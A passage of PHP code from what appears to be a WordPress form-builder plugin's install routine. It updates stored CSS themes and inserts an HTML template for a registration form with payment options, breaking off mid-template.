td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#535E74;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #535D76;\r\nmargin:5px 7px;\r\nborder-radius:4px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#535E74;\r\n}",
      "41" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n	font-size:12px !important;\n}\n.wdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\n.wdform_table2{\nfloat: left;\n}\n.ch_rad_label{\n	color:#000 !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_address select{\n	font-size:12px !important;\n}\n.label{\n	font-size:14px !important;\n	color:#000 !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	border-width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	font-size:12px !important;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.mini_label{\n	color:#000 !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		font-size:14px;\n		-webkit-transition: all 0.0s linear;\n		background-color:#FFF !important;\n		background:#FFF !important;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:0px !important;\n		margin-bottom:0px !important;\n		padding-top:0px ;\n		padding-bottom:0px;\n		color:#000;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 select{\n	font-size:14px;\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n	display:inline !important;\n}\n.wdform_table1 button{\n	margin:1px !important;\n}\n.form_view\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\n}\n.wdform_table1 button\n{\ncursor:pointer !important;\n}\n.no_spacing\n{\npadding-right:50px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 18px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:18px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\nborder:1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\nborder:1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#878787 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:yellow !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:5px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:white !important;\nborder-radius:30px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.wdform_percentage_title\n{\npadding-left:20px\n}\nspan.wdform_page_button\n{\ncursor:pointer !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\n}\r\n\r\n.ui-slider-handle:hover\r\n{\r\nbackground:none;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle:focus{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle\r\n{\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:transparent;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #999;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n",
    );
    foreach ($themes as $key => $value) {
      $updates = "css='" . $value . "'";
      
      $query = "UPDATE " . $wpdb->prefix . "formmaker_themes SET " . $updates . " WHERE id = '" . $key . "'";
      $wpdb->query($query);
     
    }
  }
  $form_ids = $wpdb->query("SELECT id FROM " . $wpdb->prefix . "formmaker WHERE `title` = 'Product Survey'");
  if (!$form_ids) {
    $table_name = $wpdb->prefix . "formmaker";
    $plugin_path = WD_FMC_URL;
    $ajax_captcha_src = add_query_arg(array('action' => 'formcontactwdcaptcha', 'digit' => 6, 'i' => 'form_id_temp'), admin_url('admin-ajax.php'));
    $form_maker_rows10 = <<<HEREQUERYFORM
    INSERT INTO `{$table_name}` (`title`, `mail`, `form`, `form_front`, `theme`, `javascript`, `submit_text`, `url`, `submit_text_type`, `script_mail`, `script_mail_user`, `counter`, `label_order`, `label_order_current`, `article_id`, `pagination`, `show_title`, `show_numbers`, `public_key`, `private_key`, `recaptcha_theme`, `paypal_mode`, `checkout_mode`, `paypal_email`, `payment_currency`, `tax`, `from_mail`, `from_name`, `script1`, `script2`, `script_user1`, `script_user2`) VALUES
    ('Registration Form With Payment', '', '<table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-top:0px solid black;"><tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Untitled page" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="13" type="type_name"><td colspan="2" id="13_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="13_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="13_label_sectionform_id_temp" class=""><span id="13_element_labelform_id_temp" class="label">Name</span><span id="13_required_elementform_id_temp" class="required"> *</span></td></tr><tr><td valign="top" align="left" id="13_element_sectionform_id_temp" class=""><input type="hidden" value="type_name" name="13_typeform_id_temp" id="13_typeform_id_temp"><input type="hidden" value="yes" name="13_requiredform_id_temp" id="13_requiredform_id_temp"><input type="hidden" value="no" name="13_uniqueform_id_temp" id="13_uniqueform_id_temp"><table id="13_table_name" cellpadding="0" cellspacing="0"><tbody><tr id="13_tr_name1"><td id="13_td_name_input_first"><input type="text" class="input_deactive" id="13_element_firstform_id_temp" name="13_element_firstform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_firstform_id_temp&quot;)" onblur="return_value(&quot;13_element_firstform_id_temp&quot;)" onchange="change_value(''13_element_firstform_id_temp'')" style="margin-right: 10px; width: 192px;"></td><td id="13_td_name_input_last"><input type="text" class="input_deactive" id="13_element_lastform_id_temp" name="13_element_lastform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_lastform_id_temp&quot;)" onblur="return_value(&quot;13_element_lastform_id_temp&quot;)" onchange="change_value(''13_element_lastform_id_temp'')" style="margin-right: 10px; width: 192px;"></td></tr><tr id="13_tr_name2"><td id="13_td_name_label_first" align="left"><label class="mini_label" id="13_mini_label_first">First</label></td><td id="13_td_name_label_last" align="left"><label class="mini_label" id="13_mini_label_last">Last</label></td></tr></tbody></table></td></tr></tbody></table></td><td id="X_13" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="2" type="type_submitter_mail"><td colspan="2" id="2_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="2_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="2_label_sectionform_id_temp" class=""><span id="2_element_labelform_id_temp" class="label">E-mail</span><span id="2_required_elementform_id_temp" class="required"> *</span></td></tr><tr><td valign="middle" align="left" id="2_element_sectionform_id_temp" class=""><input type="hidden" value="type_submitter_mail" name="2_typeform_id_temp" id="2_typeform_id_temp"><input type="hidden" value="yes" name="2_requiredform_id_temp" id="2_requiredform_id_temp"><input type="hidden" value="no" name="2_sendform_id_temp" id="2_sendform_id_temp"><input type="hidden" value="" name="2_uniqueform_id_temp" id="2_uniqueform_id_temp"><input type="text" class="input_deactive" id="2_elementform_id_temp" name="2_elementform_id_temp" value="" title="" onfocus="delete_value(''2_elementform_id_temp'')" onblur="return_value(''2_elementform_id_temp'')" onchange="change_value(''2_elementform_id_temp'')" style="width: 400px;"></td></tr></tbody></table></td><td id="X_2" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="14" type="type_address"><td colspan="2" id="14_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="14_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="14_label_sectionform_id_temp" class="wdform_address"><span id="14_element_labelform_id_temp" class="label">Address</span><span id="14_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="14_element_sectionform_id_temp" class="wdform_address"><input type="hidden" value="type_address" name="14_typeform_id_temp" id="14_typeform_id_temp"><input type="hidden" value="no" name="14_requiredform_id_temp" id="14_requiredform_id_temp"><input type="hidden" name="14_disable_fieldsform_id_temp" id="14_disable_fieldsform_id_temp" street1="no" street2="no" city="no" state="no" postal="no" country="no"><div id="14_div_address" style="width: 300px;"><span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="14_street1form_id_temp" name="14_street1form_id_temp" onchange="change_value(''14_street1form_id_temp'')" style="width: 100%;"><label class="mini_label" id="14_mini_label_street1" style="display: block;">Street Address</label></span><span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="14_street2form_id_temp" name="15_street2form_id_temp" onchange="change_value(''14_street2form_id_temp'')" style="width: 100%;"><label class="mini_label" id="14_mini_label_street2" style="display: block;">Street Address Line 2</label></span><span style="float: left; width: 48%; padding-bottom: 8px;"><input type="text" id="14_cityform_id_temp" name="16_cityform_id_temp" onchange="change_value(''14_cityform_id_temp'')" style="width: 100%;"><label class="mini_label" id="14_mini_label_city" style="display: block;">City</label></span><span style="float: right; width: 48%; padding-bottom: 8px;"><input type="text" id="14_stateform_id_temp" name="17_stateform_id_temp" onchange="change_value(''14_stateform_id_temp'')" style="width: 100%;"><label class="mini_label" id="14_mini_label_state" style="display: block;">State / Province / Region</label></span><span style="float: left; width: 48%; padding-bottom: 8px;"><input type="text" id="14_postalform_id_temp" name="18_postalform_id_temp" onchange="change_value(''14_postalform_id_temp'')" style="width: 100%;"><label class="mini_label" id="14_mini_label_postal" style="display: block;">Postal / Zip Code</label></span><span style="float: right; width: 48%; padding-bottom: 8px;"><select type="text" id="14_countryform_id_temp" name="19_countryform_id_temp" onchange="change_value(''14_countryform_id_temp'')" style="width: 100%;"><option value=""></option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Brazil">Brazil</option><option value="Brunei">Brunei</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Colombi">Colombi</option><option value="Comoros">Comoros</option><option value="Congo (Brazzaville)">Congo (Brazzaville)</option><option value="Congo">Congo</option><option value="Costa Rica">Costa Rica</option><option value="Cote d''Ivoire">Cote d''Ivoire</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="East Timor (Timor Timur)">East Timor (Timor Timur)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="Gabon">Gabon</option><option value="Gambia, The">Gambia, The</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Greece">Greece</option><option value="Grenada">Grenada</option><option value="Guatemala">Guatemala</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Honduras">Honduras</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="Korea, North">Korea, North</option><option value="Korea, South">Korea, South</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macedonia">Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mexico">Mexico</option><option value="Micronesia">Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepa">Nepa</option><option value="Netherlands">Netherlands</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russia">Russia</option><option value="Rwanda">Rwanda</option><option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option><option value="Saint Lucia">Saint Lucia</option><option value="Saint Vincent">Saint Vincent</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia and Montenegro">Serbia and Montenegro</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syria">Syria</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Togo">Togo</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Vatican City">Vatican City</option><option value="Venezuela">Venezuela</option><option value="Vietnam">Vietnam</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select><label class="mini_label" id="14_mini_label_country" style="display: block;">Country</label></span></div></td></tr></tbody></table></td><td id="X_14" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="20" type="type_radio"><td colspan="2" id="20_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="20_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="20_label_sectionform_id_temp" class=""><span id="20_element_labelform_id_temp" class="label">Registration Package</span><span id="20_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="20_element_sectionform_id_temp" class=""><input type="hidden" value="type_radio" name="20_typeform_id_temp" id="20_typeform_id_temp"><input type="hidden" value="no" name="20_requiredform_id_temp" id="20_requiredform_id_temp"><input type="hidden" value="no" name="20_randomizeform_id_temp" id="20_randomizeform_id_temp"><input type="hidden" value="no" name="20_allow_otherform_id_temp" id="20_allow_otherform_id_temp"><input type="hidden" value="1" name="20_rowcol_numform_id_temp" id="20_rowcol_numform_id_temp"><table><tbody id="20_table_little"><tr id="20_element_tr0"><td valign="top" id="20_td_little0" idi="0"><input type="radio" value="Standard Registration ($50 USD)" id="20_elementform_id_temp0" name="20_elementform_id_temp" onclick="set_default(''20'',''0'',''form_id_temp'')"><label id="20_label_element0" class="ch_rad_label" for="20_elementform_id_temp0">Standard Registration ($50 USD)</label></td></tr><tr id="20_element_tr1"><td valign="top" id="20_td_little1" idi="1"><input type="radio" value="Premium Registration ($90 USD)" id="20_elementform_id_temp1" name="20_elementform_id_temp" onclick="set_default(''20'',''1'',''form_id_temp'')"><label id="20_label_element1" class="ch_rad_label" for="20_elementform_id_temp1">Premium Registration ($90 USD)</label></td></tr><tr 